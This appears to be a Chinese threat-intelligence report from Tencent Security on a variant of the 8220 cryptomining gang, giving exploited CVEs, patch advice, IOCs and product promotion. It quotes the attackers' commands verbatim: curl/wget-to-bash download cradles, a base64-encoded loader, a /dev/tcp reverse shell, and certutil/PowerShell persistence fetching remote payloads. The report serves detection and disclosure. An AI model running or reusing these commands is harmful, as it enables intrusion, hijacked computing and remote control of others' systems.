8220挖矿木马变种利用多种漏洞入侵扩散，腾讯安全云原生方案全面检测防御

长按二维码关注

腾讯安全威胁情报中心

腾讯安全威胁情报中心接到企业客户求助，称腾讯云防火墙有风险告警，请求安全专家协助排查。腾讯安全专家根据腾讯云防火墙捕捉到的攻击流量包分析，该客户正在遭遇8220团伙新变种的攻击，由于发现、处置及时，客户未受损失。

8220团伙的此次攻击利用了Confluence远程代码执行漏洞（CVE-2019-3396）、Weblogic反序列化漏洞（CVE-2017-10271）、Weblogic反序列化漏洞（CVE-2019-2725）入侵，攻击得手后会继续通过SSH弱口令、Redis未授权访问漏洞、ActiveMQ未授权访问漏洞横向移动，以尽可能入侵控制更多主机，组建僵尸网络挖矿。

被入侵主机会连接黑客控制的服务器建立shell，接受黑客远程控制，随后安装门罗币挖矿木马。劫持Linux库文件加载过程劫持libs.so文件，Hook Readdir函数对木马进程进行隐藏，再通过安装定时任务、启动项进行持久化。

8220挖矿木马新变种同时攻击Windows平台，入侵后投递BAT、Powershell类型的恶意Payload，最终通过控制肉鸡系统组建僵尸网络来挖矿牟利。

对8220挖矿团伙的最新攻击活动，腾讯安全云原生安全产品（腾讯主机安全、腾讯云防火墙）均支持检测、防御，已部署腾讯云原生安全方案的企业客户不会受害。

腾讯云主机安全提示用户修复Confluence远程代码执行漏洞（CVE-2019-3396）

通过技术分析，完善相关威胁情报，溯源本次攻击事件，发现受到变种攻击影响的云主机有数千台。腾讯安全专家建议企业用户部署腾讯云原生安全方案，并尽快修复以下安全漏洞：

CVE-2017-10271修复建议：

对访问wls-wsat的资源进行访问控制。临时解决方案：根据实际环境路径，删除WebLogic程序下列war包及目录，

rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.warrm -f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.warrm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

CVE-2019-2725修复建议：

安装补丁包：

https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html

CVE-2019-3396修复建议：

官方已修复该漏洞，可到官网下载无漏洞版本：https://www.atlassian.com/

Redis未授权访问漏洞修复建议：

1）配置redis.conf修改bind的值，设置其绑定的ip
2）配置redis.conf，找到requirepass，设置密码

CVE-2016-3088修复建议：
1）ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除，建议升级至 5.14.0 及其以后版本。
2）也可通过移除 confjetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能。

<bean class="org.eclipse.jetty.webapp.WebAppContext">    <property name="contextPath" value="/fileserver" />    <property name="resourceBase" value="${activemq.home}/webapps/fileserver" />    <property name="logUrlOnStart" value="true" />    <property name="parentLoaderPriority" value="true" /></bean>

腾讯云防火墙捕获到的Confluence远程代码执行漏洞（CVE-2019-3396）攻击流量：

腾讯云防火墙捕获到Weblogic反序列化漏洞（CVE-2017-10271）攻击流量：

腾讯云防火墙捕获到Weblogic反序列化漏洞（CVE-2019-2725）攻击流量：

若云主机存在上述可以被利用的高危漏洞，就会执行以下恶意命令：

Confluence漏洞攻击后执行的恶意命令：

 (curl -s hxxp://198.46.202.146:1234/xmsd||wget -q -O - hxxp://198.46.202.146:1234/xmsd)|bash -sh

Weblogic漏洞攻击后执行的恶意命令：

curl -s http://209.141.40.190/xms | bash -sh; wget -q -O - http://209.141.40.190/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc=|base64 -d|bash -; lwp-download http://209.141.40.190/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/

1.从/.ssh/known_hosts中获取已认证的远程主机ID，与对应的主机建立SSH连接并执行命令下载恶意脚本xms。

2.利用下载的攻击程序hxx进行SSH扫描和爆破登陆，然后下载xms执行。

3.利用ActiveMQ未授权访问漏洞
ActiveMQ是Apache下的开源项目，是一种在分布式系统中应用程序借以传递消息的媒介。ActiveMQ默认监听在8161端口，由于未设置密码或使用默认密码可导致未授权访问，攻击者利用连接该端口并通过put请求写入文件’/fileserver/go.txt’，最终创建恶意的定时任务。

4. 针对Redis服务的6379端口进行扫描，并利用未授权访问漏洞攻击，写入恶意的定时任务。

1、 通过创建crontab定时任务持久化

2、通过写入启动项
/etc/cron.hourly/oanacroner1
/etc/init.d/down

通过Linux动态链接库LD_PRELOAD劫持加载恶意.so文件libs.so，libs.so hook readdir 函数对指定进程进行隐藏。

被控制机器反弹shell连接到控制端198.46.202.146:8899
nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 &

下载采用XMRig编译的挖矿木马hxxp://w.apacheorg.top:1234/.libs

矿池：w.apacheorg.xyz:80
钱包：
48BBjhM6wjtVPPteiAAyy4FfQogMVvJdSWqbT3T8L9cGb9NhUPRtMHkYVmzLgpYEiuh9B6J1yrXhPdjtnmf7rfQyA73rWaF

1.bat首先尝试获取管理员权限。

卸载阿里云盾。

下载挖矿木马hxxp://107.172.214.23:1234/svchostd.jpg到'%USERPROFILE%Documentsdebugsvchostd.exe'。

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('hxxp://107.172.214.23:1234/svchostd.jpg', '%USERPROFILE%Documentsdebugsvchostd.exe')"if errorlevel 1 (  echo ERROR: Can't download c3pool advanced version of xmrig  certutil -urlcache -split -f hxxp://107.172.214.23:1234/svchostd.jpg %USERPROFILE%Documentsdebugsvchostd.exe )

利用nssm将挖矿木马安装为服务启动。

"%USERPROFILE%Documentsdebugnssm.exe" install svchostd "%USERPROFILE%Documentsdebugsvchostd.exe"

添加计划任务和启动项进行持久化：

schtasks /create /tn SystemProcess /tr "cmd /c certutil -urlcache -split -f hxxp://w.apacheorg.top:1234/1.txt %USERPROFILE%Documents1.bat & %USERPROFILE%Documents1.bat" /sc daily>nul 2>nul

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v "start" /d "cmd /c certutil -urlcache -split -f hxxp://w.apacheorg.top:1234/1.txt %USERPROFILE%Documents1.bat & %USERPROFILE%Documents1.bat" /f

下载挖矿木马xmr64.exe，连接矿池xmr.givemexyz.in:8080，使用钱包
46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ挖矿门罗币。

通过PowershellTcp.ps1建立反弹shell，连接控制端198.46.202.146:8081。

该团伙相关的威胁数据已加入腾讯安全威胁情报，赋能给腾讯全系列安全产品，用户可以通过订阅腾讯安全威胁情报产品，让全网安全设备同步具备和腾讯安全一致的威胁检测、防御能力。

推荐政企用户在公有云中部署腾讯云防火墙、腾讯主机安全（云镜）检测防御相关威胁。

腾讯云防火墙已支持拦截利用Weblogic反序列化漏洞CVE-2017-10271、CVE-2019-2725发起的恶意攻击行为。

腾讯主机安全支持SSH弱口令检测，Redis基线合规检测。按基线检测的结果纠正弱口令，可避免8220挖矿木马团伙利用弱口令攻击在内网横向扩散。

私有云用户可通过腾讯高级威胁检测系统进行流量检测分析，及时发现8220挖矿团伙的攻击活动。如下图：腾讯高级威胁检测系统（御界）检测到利用Apache ActiveMQ文件上传远程代码执行（CVE-2016-3088）发起的恶意攻击行为。

IOCs

IP
209.141.40.190
194.5.249.238
198.46.202.146
107.172.214.23

Domain
w.apacheorg.xyz
w.apacheorg.top
bash.givemexyz.in

URL
hxxp://209.141.40.190/d.py
hxxp://209.141.40.190/xms.ps1
hxxp://209.141.40.190/xmr64.exe
hxxp://194.5.249.238/x86_64
hxxp://194.5.249.238/i686
hxxp://194.5.249.238/go
hxxp://107.172.214.23:1234/svchosts.jpg
hxxp://209.141.40.190/hxx
hxxp://209.141.40.190/ps
hxxp://209.141.40.190/scan
hxxp://209.141.40.190/scan.sh
hxxp://w.apacheorg.xyz:1234/1.txt
hxxp://w.apacheorg.top:1234/xmss
hxxp://w.apacheorg.top:1234/.libs
hxxp://w.apacheorg.top:1234/libs.so
hxxp://w.apacheorg.top:1234/.lib
hxxp://198.46.202.146:1234/xmsd
hxxp://bash.givemexyz.in/scan.py

MD5
lib

e5c3720e14a5ea7f678e0a9835d28283

lib

745b2347513e58b9f0a45b497b3f7e60

libs

e5c3720e14a5ea7f678e0a9835d28283

1.bat

7db35a72744f488c1c8925c50364ee80

xms.ps1

d4ae1503593d3e7e9db1256b89fa3eb5

参考链接：

腾讯主机安全（云镜）捕获8220挖矿团伙最新变种使用新漏洞对企业云服务器的攻击
“8220”挖矿木马入侵服务器挖矿，组建“海啸”僵尸网络，可发起DDoS攻击
Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)分析
https://paper.seebug.org/346/

腾讯安全威胁情报中心是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托顶尖安全专家团队支撑，帮助安全分析人员、安全运维人员快速、准确地对可疑威胁事件进行预警、处置和溯源分析。

长按二维码关注

腾讯安全威胁情报中心

本文始发于微信公众号（腾讯安全威胁情报中心）：8220挖矿木马变种利用多种漏洞入侵扩散，腾讯安全云原生方案全面检测防御